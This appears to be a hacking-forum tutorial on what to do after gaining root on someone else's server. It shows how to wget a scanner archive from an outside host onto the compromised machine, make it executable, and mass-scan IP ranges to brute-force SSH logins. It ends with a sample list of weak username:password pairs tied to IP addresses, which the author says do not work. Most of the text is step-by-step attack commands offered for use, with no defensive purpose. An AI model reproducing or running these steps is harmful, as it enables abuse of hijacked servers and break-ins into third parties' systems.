What To Do Next After Root

Well i have watched so many times someone rooted a server and mass-deface it And i was like WTF? Why dont they use it for something ealse....Till today like i promised a Tutorial what to do after you got Root on the server

So lets start What To Do Next?


-Well after geting root privileges you can do what ever you wonna with the server installing/removing/updating/adding users/browe everything.
But am not going to speak about anything above this...Am going to show you how to use the Root in the best way possible


-I dont know if anyone of you have hearded about SSH(Secure Shell Hosting) this is on port 22 its connecting on the routher and sometimes directly on the PC.This is used for hidding you ass Am using it when am doing something really stupid .Today we are going to Scan for SSH(SecureShellHosting).

What We Need:
*Root Priv. On Some Server
*Putty
*Scanner
*Patience


1st _...Putty...._


Download Link For Putty:

Code:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Download putty and connect to your hacked Server

2nd. ~Scanner~

After we connect to our Victims PC(Server) we need to get a scanner.
Here is one

[code]http://www.freewebs.com/gbl-net/cristina.tgz/[code]
Now to download it from there we use wGet Command
Code:
wget http://www.freewebs.com/gbl-net/cristina.tgz

When the download finish we need to extrat this scanner from his file and for that we use
Code:
tar -zxvf scanner_name.tgz
in this case:
Code:
tar -zxvf cristina.tgz

Than we need to enter the folder where are the files from the scanner :
Code:
cd Scanner_Folder_Name
This case:
Code:
cd Cristina

And we give all files 777 permisions so they can be executed easly from anyuser not only root
Code:
chmod +x *

After we done all this we can start scanning now you can use from proxys ips am going to use
Code:
189.254.237.190
but we do not enter the whole IP we only enter the first 2 numbers
Code:
189.254
And now we start scaning by executing this:
Code:
./start 189.254

Now we wait till the scaning ends After the scan ends its brute-forcing time its checking for user and password and we still gonna to wait
After The Scan and BruteForcing ends you can open the vuln.txt and see something like this:
Code:
cat vuln.txt
*Note: Non Of This Works..This is just to show you how it will looks!
Code:
test:test 68.15.219.98 
oscar:oscar 68.16.249.206
user:user 68.19.179.99 
test123:123456 66.113.138.78
user:1234 67.19.130.75 
guest:guest1 67.53.138.125
root:admin 67.53.145.51 
root:pa55word 67.55.5.81 
oracle:oracle 67.69.131.94 
oracle:oracle 67.69.131.30 
user:user 67.78.114.180 
root:abc123 67.78.170.186
tomcat5:tomcat5 67.87.115.176 
admin:sysmail 67.90.99.71 
root:beach 67.90.99.71
stud:stud 67.90.99.71 
trash:trash 67.90.99.71
aaron:aaron123 67.90.99.71 
gt05:gt05 67.90.99.71
william:william 67.90.99.71
stephanie:stephanie 67.90.99.71 
root:hamster 67.90.99.71
root:welcome1 67.90.99.71 
root:admin 67.90.36.86 
root:admin 67.90.36.85 
diane:diane 67.98.52.24
admin:sysmail 189.254.204.116 
root:beach 189.254.204.116 
stud:stud 189.254.204.116 
trash:trash 189.254.204.116
Thank You For Reading This Tutorial If You Like It Press Thanks And Feel Free To Comment!

Tutorial Writen By AlphaSky

Categories: